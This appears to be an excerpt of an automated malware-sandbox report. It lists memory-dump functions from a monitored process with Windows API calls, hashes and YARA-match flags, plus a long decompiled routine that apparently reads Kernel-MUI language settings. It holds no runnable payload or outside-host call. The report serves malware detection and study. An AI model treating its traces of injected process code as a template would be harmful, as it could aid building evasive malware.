                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0013A052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A08D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                                                                                                                                                      • Instruction ID: 07f12cba49d439cf8350e0b53b688290b59a8d061c46225dea170f43496420da
                                                                                                                                                      • Opcode Fuzzy Hash: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                                                                                                                                                      • Instruction Fuzzy Hash: 84E0D8B85003455FDB14EE78D5D24673B85EF80264B518A8AEC9947642C164C91987A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0013A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00123AF8), ref: 0013A08D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction ID: da6e06328b7c2190cdad30050eb0eff5f216412991d973ce27fdf182464633bc
                                                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction Fuzzy Hash: E2E01AB1200204ABD714DF59CC45EA777ACAF88750F014554B95857241C630E9108AB0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 001282F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0012834A
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012836B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                                                                                                                      • Instruction ID: ee07020c27f4f53c80e412e8b730532584a351d371dbdf326c471ddd49343aa6
                                                                                                                                                      • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                                                                                                                      • Instruction Fuzzy Hash: 28018431A802287BE720A6949C43FFE776C6B50B51F044119FF04BA1C1E794B91547E6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 001282B4, Relevance: 3.1, APIs: 2, Instructions: 53threadwindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0012834A
                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0012836B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                      • Opcode ID: d3d8ce23e3f5cd1160dac31dec85604f7d2545a95c6e10b76934c02f1b28ae6e
                                                                                                                                                      • Instruction ID: 152fe0de205715b6fe012fb7961d6504ef8700c458af4ad1ffea65a8322a7ee4
                                                                                                                                                      • Opcode Fuzzy Hash: d3d8ce23e3f5cd1160dac31dec85604f7d2545a95c6e10b76934c02f1b28ae6e
                                                                                                                                                      • Instruction Fuzzy Hash: A401CB31A406643BE710A628AC03FFE7B08BF51B14F098289FE40BE0C2C7D0681683E5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0013A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0013A124
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                      • Instruction ID: e6b03c166a57298344e10db2791d16d0de30dc8ba59c76ffe2a2406b0328b267
                                                                                                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                      • Instruction Fuzzy Hash: 3301B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA4DA7241C630E851CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0013A020, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(001344F6,?,00134C6F,00134C6F,?,001344F6,?,?,?,?,?,00000000,00000000,?), ref: 0013A04D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction ID: 06917f30bfe2bf4228ef9038655ac9f1a29b4a484e3aa64e7bf04cc467e90a79
                                                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction Fuzzy Hash: 71E012B1200208ABDB14EF99CC41EA777ACAF88654F128558BA586B242C630F9108BB0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0013A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0012F192,0012F192,?,00000000,?,?), ref: 0013A1F0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction ID: d46de7d703077636abdc7288ac345a439fbbad59354ac8f76affd5ed487e1bd5
                                                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction Fuzzy Hash: 0CE01AB1200208ABDB10DF49CC85EE737ADAF88650F018154BA4C67241CA30E8108BF5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0012F687, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,00128CF4,?), ref: 0012F6BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: 1358482e5c5b205aaab76b2eeedfd8621a6f304eaa555c97840b81e38e47df03
                                                                                                                                                      • Instruction ID: 6fe1bbdd91febd9f548d24d28eb4c34dd5244af6e76f6467cb2abb65c9cb55d9
                                                                                                                                                      • Opcode Fuzzy Hash: 1358482e5c5b205aaab76b2eeedfd8621a6f304eaa555c97840b81e38e47df03
                                                                                                                                                      • Instruction Fuzzy Hash: 4DD05B7665020437E610AA94DD03F663189AB54715F4900F8FD49FB3C7D664D41145A5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0012F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,00128CF4,?), ref: 0012F6BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                      • Instruction ID: e1189ec0d02f85aa80093c1c234e5c3c827db9d8e62d658e1243d95bd39fc844
                                                                                                                                                      • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                      • Instruction Fuzzy Hash: 58D0A9727903083BEA10FAA9EC03F6632CCAB54B00F490078FA49EB3C3EA64F4118165
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 01F98788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E01F98788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01F98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01F7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01F9718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01F98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01F9718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01F98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01F98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01F98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01F9718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01F72340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01F8E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01F7E2A8(_t322,  &_v68, _v16);
								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01F8E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01F7E2A8(_t322,  &_v68, _t236);
								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01F9718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01F72340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01F8E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01F7E2A8(_v12,  &_v68, _v16);
							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01F8E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01F7E2A8(_t322,  &_v68, _t269);
							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01F9718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01F72340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01F8E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01F7E2A8(_v12,  &_v68, _v16);
						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01F8E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01F7E2A8(_t322,  &_v68, _t296);
						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                      0x01f98788
                                                                                                                                                      0x01f98788
                                                                                                                                                      0x01f98791
                                                                                                                                                      0x01f98794
                                                                                                                                                      0x01f98798
                                                                                                                                                      0x01f9879b
                                                                                                                                                      0x01f9879e
                                                                                                                                                      0x01f987a1
                                                                                                                                                      0x01f987a4
                                                                                                                                                      0x01f987a7
                                                                                                                                                      0x01f987aa
                                                                                                                                                      0x01f987af
                                                                                                                                                      0x01fe1ad3
                                                                                                                                                      0x01f98b0a
                                                                                                                                                      0x01f98b0d
                                                                                                                                                      0x01f98b13
                                                                                                                                                      0x01f98b19
                                                                                                                                                      0x01f98b1f
                                                                                                                                                      0x01f98b25
                                                                                                                                                      0x01f98b2b
                                                                                                                                                      0x01f98b31
                                                                                                                                                      0x01f98b37
                                                                                                                                                      0x01f98b3d
                                                                                                                                                      0x01f98b46
                                                                                                                                                      0x01f98b46
                                                                                                                                                      0x01f987c6
                                                                                                                                                      0x01f987d0
                                                                                                                                                      0x01fe1ae0
                                                                                                                                                      0x01fe1ae6
                                                                                                                                                      0x01fe1af8
                                                                                                                                                      0x01fe1af8
                                                                                                                                                      0x01fe1afd
                                                                                                                                                      0x01fe1afe
                                                                                                                                                      0x01fe1b01
                                                                                                                                                      0x01fe1b06
                                                                                                                                                      0x01fe1b06
                                                                                                                                                      0x01f987d6
                                                                                                                                                      0x01f987f2
                                                                                                                                                      0x01f987f7
                                                                                                                                                      0x01f98807
                                                                                                                                                      0x01f9880a
                                                                                                                                                      0x01f9880f
                                                                                                                                                      0x01f98810
                                                                                                                                                      0x01f98813
                                                                                                                                                      0x01f98818
                                                                                                                                                      0x01f98818
                                                                                                                                                      0x01f9882c
                                                                                                                                                      0x01f98831
                                                                                                                                                      0x01f98838
                                                                                                                                                      0x01f98908
                                                                                                                                                      0x01f98920
                                                                                                                                                      0x01f989f0
                                                                                                                                                      0x01f98a08
                                                                                                                                                      0x01f98af6
                                                                                                                                                      0x01f98af6
                                                                                                                                                      0x01f98af8
                                                                                                                                                      0x01f98afb
                                                                                                                                                      0x01fe1beb
                                                                                                                                                      0x01fe1beb
                                                                                                                                                      0x01f98b04
                                                                                                                                                      0x01fe1bf8
                                                                                                                                                      0x01fe1c0e
                                                                                                                                                      0x01fe1c13
                                                                                                                                                      0x01fe1c16
                                                                                                                                                      0x01fe1c16
                                                                                                                                                      0x01fe1bf8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98b04
                                                                                                                                                      0x01f98a0e
                                                                                                                                                      0x01f98a11
                                                                                                                                                      0x01f98a14
                                                                                                                                                      0x01f98a15
                                                                                                                                                      0x01f98a18
                                                                                                                                                      0x01f98a22
                                                                                                                                                      0x01f98b59
                                                                                                                                                      0x01f98a28
                                                                                                                                                      0x01f98a3c
                                                                                                                                                      0x01f98a3c
                                                                                                                                                      0x01f98a42
                                                                                                                                                      0x01fe1bb0
                                                                                                                                                      0x01fe1b11
                                                                                                                                                      0x01fe1b11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98a48
                                                                                                                                                      0x01f98a51
                                                                                                                                                      0x01f98a5b
                                                                                                                                                      0x01f98a5e
                                                                                                                                                      0x01f98a61
                                                                                                                                                      0x01f98a69
                                                                                                                                                      0x01f98a69
                                                                                                                                                      0x01f98a6d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98a74
                                                                                                                                                      0x01f98a7c
                                                                                                                                                      0x01f98a7d
                                                                                                                                                      0x01f98a91
                                                                                                                                                      0x01f98a93
                                                                                                                                                      0x01f98a93
                                                                                                                                                      0x01f98a98
                                                                                                                                                      0x01f98a9b
                                                                                                                                                      0x01f98aa1
                                                                                                                                                      0x01f98aa1
                                                                                                                                                      0x01f98aa4
                                                                                                                                                      0x01f98aaa
                                                                                                                                                      0x01f98ab1
                                                                                                                                                      0x01f98ac5
                                                                                                                                                      0x01f98ac7
                                                                                                                                                      0x01f98ac7
                                                                                                                                                      0x01f98ac5
                                                                                                                                                      0x01f98ace
                                                                                                                                                      0x01fe1bc9
                                                                                                                                                      0x01fe1bce
                                                                                                                                                      0x01fe1bd2
                                                                                                                                                      0x01fe1bd2
                                                                                                                                                      0x01f98ad8
                                                                                                                                                      0x01f98aeb
                                                                                                                                                      0x01f98aeb
                                                                                                                                                      0x01f98af0
                                                                                                                                                      0x01f98af4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98af4
                                                                                                                                                      0x01f98a42
                                                                                                                                                      0x01f98926
                                                                                                                                                      0x01f98929
                                                                                                                                                      0x01f9892c
                                                                                                                                                      0x01f9892d
                                                                                                                                                      0x01f98930
                                                                                                                                                      0x01f98935
                                                                                                                                                      0x01f9893a
                                                                                                                                                      0x01f98b51
                                                                                                                                                      0x01f98940
                                                                                                                                                      0x01f98954
                                                                                                                                                      0x01f98954
                                                                                                                                                      0x01f9895a
                                                                                                                                                      0x01fe1b63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f98960
                                                                                                                                                      0x01f98969
                                                                                                                                                      0x01f98973
                                                                                                                                                      0x01f98976
                                                                                                                                                      0x01f98979
                                                                                                                                                      0x01f9897e
                                                                                                                                                      0x01f98981
                                                                                                                                                      0x01f98981
                                                                                                                                                      0x01f98986
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fe1b6e
                                                                                                                                                      0x01fe1b74
                                                                                                                                                      0x01fe1b7b
                                                                                                                                                      0x01fe1b8f
                                                                                                                                                      0x01fe1b91
                                                                                                                                                      0x01fe1b91
                                                                                                                                                      0x01fe1b99
                                                                                                                                                      0x01fe1b9c
                                                                                                                                                      0x01fe1ba2
